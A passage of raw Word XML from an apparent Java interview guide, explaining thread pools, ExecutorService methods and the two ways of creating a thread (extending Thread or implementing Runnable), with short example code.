    <w:p w14:paraId="4FB79707"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5129D78F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3F77FE" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16EB2C75"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public class CustomThreadPoolExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57154E88"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772A2ED"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 Create a thread pool with custom parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E1510A"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ThreadPoolExecutor customThreadPool = new ThreadPoolExecutor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EEB888"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2, // core pool size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122A39B0"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4, // maximum pool size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F3C736"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60, // idle thread timeout (in seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2E5E40"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TimeUnit.SECONDS, // time unit for the timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE28BFF"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new LinkedBlockingQueue&lt;&gt;(10) // task queue (capacity 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21B22C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BCF144" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="008088C9"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 Submitting tasks to the custom thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C3AA5"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for (int i = 0; i &lt; 10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1632AB8E"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customThreadPool.submit(new MyRunnable());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EC1CD6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B04B2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40902164"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 Shutting down the thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745DD590"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customThreadPool.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6E627"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xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2548554A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FCB9AB"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3. Shutting down a Thread Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146BC165"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Once you're done submitting tasks, it’s important to shut down the thread pool gracefully. This can be done using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E7053B" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>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shutdown()</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It initiates an orderly shutdown in which previously submitted tasks are executed, but no new tasks will be accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC04B20" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1209"/>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shutdownNow()</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It attempts to stop all actively executing tasks and halts the processing of waiting tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450EE849"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F2144E"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ExecutorService threadPool = Executors.newFixedThreadPool(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D01E1BB" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3DA444"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 Submit tasks...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D39CAB" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>threadPool.shutdown();  // Gracefully shuts down the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E2F67"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Key Methods for ExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD4FBF" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>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submit()</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Submits a task to be executed by the thread pool. It returns a Future object that can be used to monitor or get the result of the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49173F" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>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invokeAll()</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Submits a collection of tasks for execution and waits for them to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DA2F5" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>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lastRenderedPageBreak/>
        <w:t>invokeAny()</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Submits a collection of tasks for execution and returns the result of the first successfully completed task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C314708" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>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shutdown()</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initiates an orderly shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597EAFF5" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>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shutdownNow()</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tries to stop all running tasks immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3130BA"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Advantages of Using Thread Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362750E6" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>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Reduced Overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reusing threads from the pool reduces the overhead of creating new threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D574ED0" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>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Better Resource Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The thread pool allows you to control the maximum number of concurrent threads, avoiding resource exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39775170" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>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Improved Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tasks are executed efficiently by reusing threads rather than creating new ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C014B" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flexibility:</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can customize the thread pool behavior, such as the number of threads, task queue size, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A5849" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2829D1A5" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00CE4B95" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread pools are a powerful way to manage and execute tasks concurrently in Java. You can use Executors to create different types of thread pools or customize them using ThreadPoolExecutor. By using thread pools, you can optimize resource management and improve performance when executing concurrent tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA0FDC" w14:textId="0E8F310B" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000962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B386BE0">
          <v:rect id="_x0000_i1855" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF6C79" w14:textId="77777777" w:rsidR="00A920A9" w:rsidRPr="00CE4B95" w:rsidRDefault="00A920A9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="286" w:name="_Toc196307766"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which method you will override in order to create a thread?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="286"/>
    </w:p>
    <w:p w14:paraId="0BD03C31" w14:textId="1BB66BAB" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To create a thread in Java, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>override the run() method</w:t>
      </w:r>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the Runnable interface or the Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1D9AC" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>There are two main ways to create a thread in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32288C54" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. By Extending the Thread class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589C3B1F"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You can create a custom thread by extending the Thread class and overriding its run() method. The run() method contains the code that will be executed by the thread when it starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94EE79" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D8C78"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class MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6952C2D0"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 xml:space="preserve">    @Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2708A312"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 xml:space="preserve">    public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1164A689"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 xml:space="preserve">        System.out.println(Thread.currentThread().getName() + " is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5583B3"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA5121"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F7366F" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AEFF2D4"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public class ThreadExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024372D4"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 xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7098F140"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 xml:space="preserve">        // Create a thread instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366C13F9"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 xml:space="preserve">        MyThread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B46FB44"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 xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D22484E"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 xml:space="preserve">        // Start the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CA1B1"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 xml:space="preserve">        thread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C13D678"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2017AB43"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4711F1F2"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In this example, we extend the Thread class and override its run() method to specify the code that will be executed by the thread. Calling start() on the thread will invoke the run() method in a new thread of execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167BAB21" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. By Implementing the Runnable interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160DF24"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Another way to create a thread is by implementing the Runnable interface and overriding its run() method. This approach is more flexible than extending the Thread class because it allows your class to extend other classes as well (since Java supports only single inheritance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5D2CDD" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8EEA62"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class MyRunnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2921C"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 xml:space="preserve">    @Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796C1436"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 xml:space="preserve">    public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425045DE"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 xml:space="preserve">        System.out.println(Thread.currentThread().getName() + " is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C951F01"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD33C89"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C61F14" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA2E46F"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public class RunnableExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30224992"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 xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6D3850"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        // Create a Runnable object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F161979"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 xml:space="preserve">        MyRunnable runnable = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC0A93"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 xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E9E83"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 xml:space="preserve">        // Create a Thread with the Runnable object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63640432"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 xml:space="preserve">        Thread thread = new Thread(runnable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F01CEB4"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 xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53638F61"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 xml:space="preserve">        // Start the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D805AB9"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 xml:space="preserve">        thread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302546EC"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211E8BCD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE5F690"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In this approach, we implement the Runnable interface and override its run() method. Then we create a Thread object by passing the Runnable object to the Thread constructor and start the thread using start().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3030C9E8" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00136F15">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Difference:</w:t>
      </w:r>
    </w:p>
